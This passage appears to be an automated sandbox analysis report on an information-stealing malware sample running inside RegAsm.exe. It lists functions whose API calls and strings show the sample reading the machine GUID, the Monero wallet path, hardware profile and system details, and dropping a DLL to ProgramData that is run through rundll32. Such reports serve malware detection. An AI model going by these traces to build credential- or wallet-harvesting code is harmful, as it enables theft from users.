Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 004115D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00411607
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
CharToOemA.USER32(?,?), ref: 0041166B

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0041161C
MachineGuid, xrefs: 00411640

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CharOpenQueryValue_memset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2355623204-1211650757
Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14

Function 00401A51 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
HeapAlloc.KERNEL32(00000000), ref: 00401A6C
RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
wallet_path, xrefs: 00401A9C

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: SOFTWARE\monero-project\monero-core$wallet_path
API String ID: 3676486918-4244082812
Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24

Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041175E
CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
SysAllocString.OLEAUT32(?), ref: 0041178E
_wtoi64.MSVCRT ref: 004117C1
SysFreeString.OLEAUT32(?), ref: 004117DA
SysFreeString.OLEAUT32(00000000), ref: 004117E1

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
String ID:
API String ID: 181426013-0
Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59

Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
_memset.LIBCMT ref: 004010D0
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
ExitProcess.KERNEL32 ref: 00401112

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
String ID:
API String ID: 1859398019-0
Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C

Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

ShellExecuteEx.SHELL32(?), ref: 00412B84

Strings

C:\ProgramData\, xrefs: 00412995
"" , xrefs: 00412A32
C:\Windows\system32\rundll32.exe, xrefs: 00412AE3
.dll, xrefs: 004129ED

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
API String ID: 2215929589-2108736111
Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98

Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004116CE

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

Unknown, xrefs: 0041173C

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
String ID: Unknown
API String ID: 2781187439-1654365787
Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58

Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
HeapAlloc.KERNEL32(00000000), ref: 00411138
GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
wsprintfA.USER32 ref: 0041117A

Strings

%d MB, xrefs: 00411174

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB
API String ID: 3644086013-2651807785
Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759

Function 00410B30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95

Strings

Windows 11, xrefs: 00410B5C

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: Windows 11
API String ID: 3676486918-2517555085
Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714

Function 00410BA9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 36memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD

Strings

CurrentBuildNumber, xrefs: 00410BF5

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3676486918-1022791448
Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50

Function 0041566F Relevance: 7.6, APIs: 5, Instructions: 107registrystringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004156A4
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
lstrcatA.KERNEL32(?,?), ref: 00415725
lstrcatA.KERNEL32(?), ref: 00415738

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$OpenQueryValue_memset
String ID:
API String ID: 3357907479-0
Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94

Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,759774F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6

Memory Dump Source

Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99

Function 6C0FC930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C0FC947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C0FC969
GetSystemInfo.KERNEL32(?), ref: 6C0FC9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C0FC9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C0FC9E2

Memory Dump Source

Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true

Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 092ded7c542a035f3c0ba023e5cdf9541d45004dffba8d55877eacf50927b7d8
Instruction ID: a27fd17dbf4742c9f4cc35a286d74f25eceafee9ee36f89d0833835e5eb2a157
Opcode Fuzzy Hash: 092ded7c542a035f3c0ba023e5cdf9541d45004dffba8d55877eacf50927b7d8
Instruction Fuzzy Hash: E1210A317052146BDB14AE65CC89BBE73F9AF86344F50012EFD53A7B40DB70A944D790

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
